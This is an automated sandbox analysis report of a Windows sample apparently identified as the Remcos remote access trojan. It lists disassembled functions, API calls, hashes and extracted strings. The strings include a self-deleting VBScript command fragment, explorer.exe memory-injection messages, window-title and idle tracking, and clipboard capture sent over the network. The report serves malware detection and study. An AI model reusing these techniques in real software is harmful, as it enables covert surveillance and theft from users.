                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 65535$udp
                                                                                          • API String ID: 0-1267037602
                                                                                          • Opcode ID: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                                                          • Instruction ID: a9902b4e2b63063b067a15c036b171ad6d3a8658db747517b03e91dd9f9ead29
                                                                                          • Opcode Fuzzy Hash: 92e56e7e39f2557d79d3192c533dec3724d183fd0175ec4c26052f24408cebce
                                                                                          • Instruction Fuzzy Hash: FB51D431605301ABDB609B14E905BFB77E8ABC5754F08042FF88597390E76CCCC1969E
                                                                                          Function 0040AD11 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __Init_thread_footer.LIBCMT ref: 0040AD73
                                                                                          • Sleep.KERNEL32(000001F4), ref: 0040AD7E
                                                                                          • GetForegroundWindow.USER32 ref: 0040AD84
                                                                                          • GetWindowTextLengthW.USER32(00000000), ref: 0040AD8D
                                                                                          • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040ADC1
                                                                                          • Sleep.KERNEL32(000003E8), ref: 0040AE8F
                                                                                            • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,00000000,0040B245,00000000), ref: 0040A69D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                          • String ID: [${ User has been idle for $ minutes }$]
                                                                                          • API String ID: 911427763-3954389425
                                                                                          • Opcode ID: c912e197c73d9db89f024b1bb19b90fd33058fd4241f711361d4b0a09d8c727e
                                                                                          • Instruction ID: 479ab846abdc3ffa357cf8cfb056c4a9d7a1c57035fbb5610920680a3dc8d5cf
                                                                                          • Opcode Fuzzy Hash: c912e197c73d9db89f024b1bb19b90fd33058fd4241f711361d4b0a09d8c727e
                                                                                          • Instruction Fuzzy Hash: 1251E2716043419BD714FB22D856AAE7795AF84308F10093FF986A22E2EF7C9D44C69F
                                                                                          Function 0040D83A Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 148COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                                                            • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                                                            • Part of subcall function 00413733: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 0041374F
                                                                                            • Part of subcall function 00413733: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00413768
                                                                                            • Part of subcall function 00413733: RegCloseKey.KERNEL32(00000000), ref: 00413773
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
                                                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
                                                                                          • ExitProcess.KERNEL32 ref: 0040D9FF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                          • String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                          • API String ID: 1913171305-2411266221
                                                                                          • Opcode ID: aa01c724678a77a7f266d250699ed78b0e530eeae90dcf4a694e4abb02ef66b9
                                                                                          • Instruction ID: 6f299f75ad759bd4c56b3f4cab90e5e1fe41ff60d22e8747b975e3d2bb757992
                                                                                          • Opcode Fuzzy Hash: aa01c724678a77a7f266d250699ed78b0e530eeae90dcf4a694e4abb02ef66b9
                                                                                          • Instruction Fuzzy Hash: 9B4129719001155ACB15FBA2DC56DEEB778AF50709F10017FB10AB21E2FF785E8ACA98
                                                                                          Function 0043A8BA Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A912
                                                                                          • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A91F
                                                                                          • __dosmaperr.LIBCMT ref: 0043A926
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A952
                                                                                          • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A95C
                                                                                          • __dosmaperr.LIBCMT ref: 0043A963
                                                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A9A6
                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A9B0
                                                                                          • __dosmaperr.LIBCMT ref: 0043A9B7
                                                                                          • _free.LIBCMT ref: 0043A9C3
                                                                                          • _free.LIBCMT ref: 0043A9CA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                          • String ID:
                                                                                          • API String ID: 2441525078-0
                                                                                          • Opcode ID: 289d0842b92f941f4feb2be478b72c6b1387c4c53bdf58ebb9c1b022d59fa5b6
                                                                                          • Instruction ID: 3a2165a63a30732921e8d6571a772c998230e0148124485b419b79488018c54b
                                                                                          • Opcode Fuzzy Hash: 289d0842b92f941f4feb2be478b72c6b1387c4c53bdf58ebb9c1b022d59fa5b6
                                                                                          • Instruction Fuzzy Hash: 8631D5B180420AFBDF01AFA5CC45EAF3B6CEF09324F11451AF950662A1DB38CD61DB66
                                                                                          Function 004054A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SetEvent.KERNEL32(?,?), ref: 004054BF
                                                                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                                                                                          • TranslateMessage.USER32(?), ref: 0040557E
                                                                                          • DispatchMessageA.USER32(?), ref: 00405589
                                                                                          • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                                                                          • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                          • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                          • API String ID: 2956720200-749203953
                                                                                          • Opcode ID: 1bd109076387e121da66e8bdd14051b4dbf222a8e6c68161d63d47e83e4b79c6
                                                                                          • Instruction ID: d37e718accd843302ceacc2187c81124e04698433963f5de03abd71ab6b9016f
                                                                                          • Opcode Fuzzy Hash: 1bd109076387e121da66e8bdd14051b4dbf222a8e6c68161d63d47e83e4b79c6
                                                                                          • Instruction Fuzzy Hash: 39419071A04301ABCB14FB76DC5A86F37A9AB85704F40493EF516A31E1EF3C8905CB9A
                                                                                          Function 0041697B Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 46clipboardCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • OpenClipboard.USER32 ref: 0041697C
                                                                                          • EmptyClipboard.USER32 ref: 0041698A
                                                                                          • CloseClipboard.USER32 ref: 00416990
                                                                                          • OpenClipboard.USER32 ref: 00416997
                                                                                          • GetClipboardData.USER32(0000000D), ref: 004169A7
                                                                                          • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                                                                          • CloseClipboard.USER32 ref: 004169BF
                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                          • String ID: !D@
                                                                                          • API String ID: 2172192267-604454484
                                                                                          • Opcode ID: d45687c870201b0dabbd41d7f1757c88dbe4de035b9da3459f2691080a45fbe1
                                                                                          • Instruction ID: c3dc955394dadbf9cb8fa72aed918e4e170398eafb94270add22466952777bd7
                                                                                          • Opcode Fuzzy Hash: d45687c870201b0dabbd41d7f1757c88dbe4de035b9da3459f2691080a45fbe1
                                                                                          • Instruction Fuzzy Hash: AA014C31204301EFC714BB72DC49AAE7BA5AF88742F40047EF906861E2DF388C45C659
                                                                                          Function 0041AB9E Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABAD
                                                                                          • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABC4
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABD1
                                                                                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABE0
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF1
                                                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A517,00000000), ref: 0041ABF4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                                                          • String ID:
                                                                                          • API String ID: 221034970-0
                                                                                          • Opcode ID: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                                                                          • Instruction ID: a7ddf6af562b27afc3fdb57d9320cc893b1711f81dd6882f7bac22400d97ef93
                                                                                          • Opcode Fuzzy Hash: 77d1dba04074bb5c0b27b9b0f176deadcb724c45256b7ec0605674b85678f877
                                                                                          • Instruction Fuzzy Hash: 1411E931501218BFD711AF64DC85CFF3B6CDB41B66B000426FA0692191EB689D46AAFA
                                                                                          Function 004481A1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _free.LIBCMT ref: 004481B5
                                                                                            • Part of subcall function 00446802: RtlFreeHeap.NTDLL(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                                            • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                          • _free.LIBCMT ref: 004481C1
                                                                                          • _free.LIBCMT ref: 004481CC
                                                                                          • _free.LIBCMT ref: 004481D7
                                                                                          • _free.LIBCMT ref: 004481E2
                                                                                          • _free.LIBCMT ref: 004481ED
                                                                                          • _free.LIBCMT ref: 004481F8
                                                                                          • _free.LIBCMT ref: 00448203
                                                                                          • _free.LIBCMT ref: 0044820E
                                                                                          • _free.LIBCMT ref: 0044821C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                          • String ID:
                                                                                          • API String ID: 776569668-0
                                                                                          • Opcode ID: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                                          • Instruction ID: 68a5115f29dd4dda1e04096f5587add38bc33a27c3b2fba9646c6a67a64c999e
                                                                                          • Opcode Fuzzy Hash: 7409258e8d3de90c3944c0df00460aed843c684c15a9003062b0a9d40dd376ab
                                                                                          • Instruction Fuzzy Hash: AA11E9B6901108BFDB01FF55C852CDD3B65FF05354B0244AAF9488F222DB75DE509B95
                                                                                          Function 0041A045 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 176sleeptimeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 0041A04A
                                                                                          • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 0041A07C
                                                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
                                                                                          • Sleep.KERNEL32(000003E8), ref: 0041A18E
                                                                                          • GetLocalTime.KERNEL32(?), ref: 0041A196
                                                                                          • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                          • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                          • API String ID: 489098229-3790400642
                                                                                          • Opcode ID: 9ca3d8a5fd9104a035863b57295875439c18cda5a03c1d5b6dbcacfb627d70fe
                                                                                          • Instruction ID: 12d64888f2a2aa40a87de1a625a26b3edd7a2139bf4817292c9f8cf1352d8a2d
                                                                                          • Opcode Fuzzy Hash: 9ca3d8a5fd9104a035863b57295875439c18cda5a03c1d5b6dbcacfb627d70fe
                                                                                          • Instruction Fuzzy Hash: 7A517D70A002159ACB14BBB5C8529FD77A9AF54308F40407FF509AB1E2EF7C9D85C799
                                                                                          Function 00455F84 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0045707F), ref: 00455FA7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: DecodePointer
                                                                                          • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                          • API String ID: 3527080286-3064271455
                                                                                          • Opcode ID: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                                                                          • Instruction ID: a80f67f54703b8f0c72b4cfac69ffbb6288a0afb30985e2ab5cebdbe3ffe6fde
                                                                                          • Opcode Fuzzy Hash: 91e2bc993b3a5d0be0d2963f4ae304432519259fdd54363bb3d88c255dc20ba7
                                                                                          • Instruction Fuzzy Hash: BB515071900909DBCF10DF58E9481BDBBB0FF49306F924197D841A7396DB798928CB1E
                                                                                          Function 004174D0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
                                                                                            • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                                                                          • Sleep.KERNEL32(00000064), ref: 0041755C
                                                                                          • DeleteFileW.KERNEL32(00000000), ref: 00417590
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$CreateDeleteExecuteShellSleep
                                                                                          • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                          • API String ID: 1462127192-2001430897
                                                                                          • Opcode ID: 7ee4514eed1a1dddd906965fce02a2aa16fc20dadb78bf3722bf63102eb4391d
                                                                                          • Instruction ID: 6598d36db715e58345e35b35962d03aab6dacf30af49f41f33489dbeb2d48940
                                                                                          • Opcode Fuzzy Hash: 7ee4514eed1a1dddd906965fce02a2aa16fc20dadb78bf3722bf63102eb4391d
                                                                                          • Instruction Fuzzy Hash: 17313F71940119AADB04FB61DC96DED7735AF50309F00017EF606731E2EF785A8ACA9C
                                                                                          Function 004073E7 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 99COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 00407418
                                                                                          • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Users\user\Desktop\6Ctc0o7vhqKgjU7.exe), ref: 004074D9
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CurrentProcess
                                                                                          • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                                                          • API String ID: 2050909247-4242073005
                                                                                          • Opcode ID: c959bd930998c8f390064940774d0a1512e2843fb7eeb626fe9b06c6253c3d56
                                                                                          • Instruction ID: c8d37550e6f1e63eabf3c93e4c9511e0cbcdb01d3c289a22ccdf2b55afca88d7
                                                                                          • Opcode Fuzzy Hash: c959bd930998c8f390064940774d0a1512e2843fb7eeb626fe9b06c6253c3d56
                                                                                          • Instruction Fuzzy Hash: DE317EB1A44300ABD314EF65DD46F1677B8BB04705F10087EF509A6692EBB8B8458B6F
                                                                                          Function 00410E9C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
                                                                                          • int.LIBCPMT ref: 00410EBC
                                                                                            • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                                            • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                                                          • std::_Facet_Register.LIBCPMT ref: 00410EFC
                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
                                                                                          • __Init_thread_footer.LIBCMT ref: 00410F64
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                                                          • String ID: ,kG$0kG
                                                                                          • API String ID: 3815856325-2015055088
                                                                                          • Opcode ID: 0df5c5a73a4f0609ec37d72de2388ae496d2ae77879c5bcc00101055df3a6b79
                                                                                          • Instruction ID: 6b7561e6e5701aa818233467e21ea388c72e3112cb5a37ed7db11c94fdfc7bf8
                                                                                          • Opcode Fuzzy Hash: 0df5c5a73a4f0609ec37d72de2388ae496d2ae77879c5bcc00101055df3a6b79
                                                                                          • Instruction Fuzzy Hash: 682129329005249BCB14FB6AD8429DE77A9DF48324F21416FF404E72D1DFB9AD818B9D
                                                                                          Function 0041D4EE Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
                                                                                            • Part of subcall function 0041D5A0: RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                                                                            • Part of subcall function 0041D5A0: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                                                                            • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
                                                                                          • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
                                                                                          • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D558
                                                                                          • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D56E
                                                                                          • TranslateMessage.USER32(?), ref: 0041D57A
                                                                                          • DispatchMessageA.USER32(?), ref: 0041D584
                                                                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D591
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                          • String ID: Remcos
                                                                                          • API String ID: 1970332568-165870891
                                                                                          • Opcode ID: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                                                          • Instruction ID: 0a96d410cd687733bc2db9baaca44b2a156926270a6f860d3af68fdb0bcdced8
                                                                                          • Opcode Fuzzy Hash: bb528cd859a2941ef755fedfca18549d942758f832e9eaa985f33bd327a59cbd
                                                                                          • Instruction Fuzzy Hash: CA0152B1840244EBD7109FA5EC4CFABBB7CEBC5705F00406AF515931A1D778D885CB58
                                                                                          Function 0044CE00 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ed6e8dde3cdd9862c5be3ded71a2773307dc59359bf90b76219a4653831d67c7
                                                                                          • Instruction ID: c312da418a410335279f0cc1971bad4557be7deeadefc114a47e367d78dfde09
                                                                                          • Opcode Fuzzy Hash: ed6e8dde3cdd9862c5be3ded71a2773307dc59359bf90b76219a4653831d67c7
                                                                                          • Instruction Fuzzy Hash: 94C1FA70D04249AFEF11DFA8CC41BAE7BB0AF09304F19415AE915A7392C77C9941CB69
                                                                                          Function 00453E03 Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCPInfo.KERNEL32(?,?), ref: 00453EAF
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00453F32
                                                                                          • __alloca_probe_16.LIBCMT ref: 00453F6A
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00453FC5
                                                                                          • __alloca_probe_16.LIBCMT ref: 00454014
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00453FDC
                                                                                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00454058
                                                                                          • __freea.LIBCMT ref: 00454083
                                                                                          • __freea.LIBCMT ref: 0045408F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000003.00000002.4149444295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000003.00000002.4149444295.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_3_2_400000_6Ctc0o7vhqKgjU7.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                          • String ID:
                                                                                          • API String ID: 201697637-0
                                                                                          • Opcode ID: 1c79323f55dedcab474402cd530056180fcf6acbc2628831f9fcb1c62bebc053
                                                                                          • Instruction ID: 957693029e8655488503f3238c5b69ab87e72ad781d0cd1ca1c521277c14990f
                                                                                          • Opcode Fuzzy Hash: 1c79323f55dedcab474402cd530056180fcf6acbc2628831f9fcb1c62bebc053
                                                                                          • Instruction Fuzzy Hash: 2B91D472E002069BDB208E65C846EEFBBF59F49756F14051BED00EB282D73DCD898769
                                                                                          Function 004451FA Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
